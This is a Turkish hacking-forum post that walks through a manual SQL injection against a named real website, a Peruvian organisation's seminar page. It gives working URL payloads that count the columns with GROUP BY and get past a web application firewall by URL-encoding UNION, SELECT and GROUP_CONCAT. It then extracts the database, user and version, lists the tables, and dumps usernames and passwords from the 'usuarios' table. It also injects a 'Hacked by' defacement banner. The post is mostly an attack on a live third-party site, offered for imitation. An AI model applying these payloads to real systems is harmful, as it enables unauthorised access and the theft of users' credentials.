Manuel SQL İnjection, Waff bypass denemesi #1

27-03-2021, 03:42:48

#1
Quantaism

Açık Profil bilgileri

Özel Mesaj Gönder

Quantaism tarafından gönderilen tüm mesajları bul

Quantaism'ı arkadaş olarak ekle
Öncelikle Herkese Selamun Aleyküm Arkadaşlar

Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz,basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=93%27

Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz (:
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .
Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,7 7,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93, 94,95,96,97,98,99,100--+-

Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya (: hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=-93' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-

Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.

Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=-93' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','
','<img src=https://i.hizliresim.com/DPrBm6.gif>','
','database_name=%0A',database(),'
','user=%0A',user(),'
','version=%0A',version(),'
'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.

Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=-93' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'
'),10,11,12,13+from+information_schema.tables+wher e+table_schema=database()--+-

evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.

Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=-93' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'
'),10,11,12,13+from+information_schema.columns+whe re+table_name=0x7573756172696f73--+-

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.
Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=-93' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'
'),10,11,12,13+from+usuarios--+-

burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.

Kod:
http://jdccpp.org.pe/detalle-seminario.php?id=-93' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e, 'password',0x3a,pass))))x),10,11,12,13--+-

Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.